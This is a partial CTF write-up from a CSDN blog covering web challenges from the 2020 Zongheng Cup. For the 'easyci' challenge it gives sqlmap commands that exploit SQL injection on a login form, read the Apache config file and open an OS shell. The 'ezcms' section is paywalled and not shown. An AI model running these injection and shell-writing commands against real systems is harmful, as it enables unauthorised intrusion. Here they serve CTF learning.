纵横杯CTF部分WEB题解

最新推荐文章于 2024-04-20 10:00:00 发布
最新推荐文章于 2024-04-20 10:00:00 发布
阅读量777 收藏
点赞数 1
分类专栏: web类 文章标签: java linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChenZIDu/article/details/111792190
版权

easyci

一道SQL注入题,大概思路:sql注入写入shell,读取flag文件。
sqlmap先读取"/etc/apache2/apache2.conf"内容。

sqlmap -u http://eci-2ze0xe7juyhmgubdhea1.cloudeci1.ichunqiu.com/public/index.php/home/login --data "username=admin&password=1" -p username --technique B --dbms mysql --threads=10 --file-read="/etc/apache2/apache2.conf"

在这里插入图片描述

发现绝对路径(/var/sercet/html)再写入shell

sqlmap -u http://eci-2ze3qpk9e6qoggl1cuol.cloudeci1.ichunqiu.com/public/index.php/home/login --data "username=admin&password=1" -p username --technique B --dbms mysql --os-shell

ezcms

参考文章:

最低0.47元/天 解锁文章
ChenZIDu
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
EasyPHP-5.3.8.0-setup
09-27
apache,php,mysql等资源安装与BugFree配套使用
EasyPHP-5.3.5.0-setup.exe
11-25
c++bulider班级程序下载,有助于我们对班级系统的初步认识。
纵横杯2020 web wp
会下雪的晴天
01-02 732
title: 纵横杯2020 web wp date: 2020-12-26 18:19:03 tags: CTF categories: 比赛 link:https://yq1ng.github.io/ 图片是新博客截图过来的,可能糊了,可以去新博客地址看 WankkoRee师傅、Mr.水函师傅带飞我,这次比赛学到不少东西,先放个排名,膜拜师傅们 第一次ak web,后援团的大师傅们的思路都很骚,多多学习,今天被引号闭合搞了两次,以后注意,phar的闭合与cms的闭合 easyci hel.
2020纵横杯网络安全竞赛web-wp
Firebasky的博客
12-27 1753
今天没有又没有复习数据结构,和师傅们打了这个比赛,最后终于ak了web。感谢师傅们的帮助~ 这次团名次也不错,再接再厉~ 链接:https://pan.baidu.com/s/1lSg-GT-v9jh4t9hmZJOVxw 提取码:nle4 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
SM4算法简介
最新发布
xnxqwzy的博客
04-20 1161
SM4为分组对称密码算法,明文、密文以及密钥长度均为 128 128 128 bits。SM4算法主要包括加解密算法和密钥扩展算法,采用 32 3232轮非线性迭代的数学结构,其中算法中每一次迭代运算为一轮非线性变换。主要操作包括异或、合成置换、非线性迭代、反序变换、循环移位以及S盒变换等。加密算法和解密算法的数学架构、运算法则、运算操作等都是完全相同的,解密运算只需要将加密算法中生成的轮密钥进行反序使用。其流程图如下图所示。![SM4密码算法加密流程图](https://img-
[2021N1CTF国际赛]Easyphp-Wp
Y4tacker的博客
11-22 2879
文章目录写在前面Wp简单分析小实验验证猜想可效性构造tar参考文章 写在前面 在各种带飞的情况下,web被带ak了,这里比较想写一个easyphp的wp,这题到结束也只有14个解,其他的懒得写了,本文也只是简单分析 Wp 简单分析 看看首页源码 再看这里很明显是触发phar反序列化 如何插入数据是一个问题,这里没有上传,再看log.php 关键部分源码是这个,我们就应该去想如何去构造,这里phar太难搞了,具体可以看看官方文档关于他的结构,后面最后四位肯定是GBMB多一位都不行,这里想到了tar,本来
CyBRICS CTF Quals 2019 Web 题解1
08-04
CyBRICS CTF Quals 2019 Web 题解一大堆字,直接查看final.html的源码,没什么发现然后把final.html删掉,发现index
西普WEB部分题解
12-09
西普WEB部分题解,需要在西普刷题的CTF小伙伴赶紧下载吧
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
中山市香山杯 2021 CTF zip
12-07
中山市香山杯 2021 CTF zip
2020-纵横杯-Writeup.pdf
03-15
2020年纵横CTF比赛Writeup 高清PDF版
ref:CodeIgniter框架内核设计缺陷可能导致任意代码执行
weixin_30644369的博客
06-26 368
ref:https://www.seebug.org/vuldb/ssvid-96217 简要描述: 为准备乌云深圳沙龙,准备几个0day做案例。 官方承认这个问题,说明会发布补丁,但不愿承认这是个『漏洞』……不过也无所谓,反正是不是都没美刀~ 详细说明: CI在加载模板的时候,会调用 $this->load->view('template_name', $data)...
XDCTF2015代码审计全解
weixin_30609331的博客
05-28 241
此次CTF WEB2是一个大题,一共4个flag,分别代表:获取源码、拿下前台管理、拿下后台、getshell。 目标站:http://xdsec-cms-12023458.xdctf.win/ 根据提示: 0×01 获取源码 “时雨的十一 时雨是某校一名学生,平日钟爱php开发。 十一七天,全国人民都在水深火热地准备朋友圈杯旅游摄影大赛,而苦逼的时雨却只能在宿舍给某邪恶组织开发CMS—...
CodeIgniter4.x反序列化漏洞
小小猪的博客
11-10 2897
CodeIgniter4.x反序列化漏洞 CodeIgniter介绍: CodeIgniter 是一个为用 PHP 编写网络应用程序的人员提供的工具包。它的目标是实现让你比从零开始编写代码更快速地开发项目,为此,CI 提供了一套丰富的类库来满足通常的任务需求,并且提供了一个简单的接口和逻辑结构来调用这些库。CodeIgniter 可以将需要完成的任务代码量最小化,这样你就可以把更多的精力放到项目的开发上了。 漏洞介绍: 因部分函数过滤不合理,联合导致漏洞形成。CI框架建立于PHP>=7.2版本
CTF-BUUCTF-Web-[护网杯 2018]easy_tornado
qq_42404383的博客
12-29 1340
CTF-BUUCTF-Web-[护网杯 2018]easy_tornado 看题: 解题: 1、flag --> 在文件 fllllllllllllag中 2、render()函数渲染 --> 用到SSTI 尝试输入/error?msg={{1}},确实是存在模板注入 3、cookie_secret 4、解题 cookie_secret --> ‘43998eab-59...
纵横杯mosaicWP
weixin_53622248的博客
12-27 262
题目来源https://race.ichunqiu.com/competition?k=Xj9SZAs0UGABe1Y4UDtQMwtoBWNePVBlBG0DZwJlBjAFb1psXWcGNQY3VmRTbg%3D%3D纵横杯马赛克 下载下题目发现是一张涂满马赛克的的图片,根据解题人数我猜测这题可做,于是上网搜了一下怎样还原马赛克。然后发现居然有一个叫Depix的工具:https://github.com/beurtschipper/Depix下载下来使用即可得到flag 使用方法:命令行输入pytho
ctf不允许上传该类型php,d3ctf easyweb题解
weixin_42474164的博客
04-01 463
前言这道题思路其实就是,如果在php中遇到了模版注入,但是限制了不允许执行php代码的时候,怎么通过模版注入达到RCE的效果考点预期:二次注入模版注入phar反序列化CI RCE POP链挖掘非预期:二次注入模版注入SSTI沙箱逃逸二次注入image.png可以看到,在get_view的时候,通过session中的userid从数据库中取出了用户的username,之后对username进行了两次...
[SUCTF 2019]EasyWeb
沐目的博客
11-03 5435
https://blog.csdn.net/qq_42181428/article/details/99741920 https://www.cnblogs.com/cimuhuashuimu/p/11546422.html
ctf 菜鸟杯 web签到
09-12
CTF菜鸟杯的Web签到题目中,参与者需要通过某种方式获取flag。根据引用[2]的内容,有人成功获取了flag,flag的值是ctfshow{f187f7ae-fffe-4631-b2e1-29dad7adc5be}。值得一提的是,根据引用和引用的描述,这些Web...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值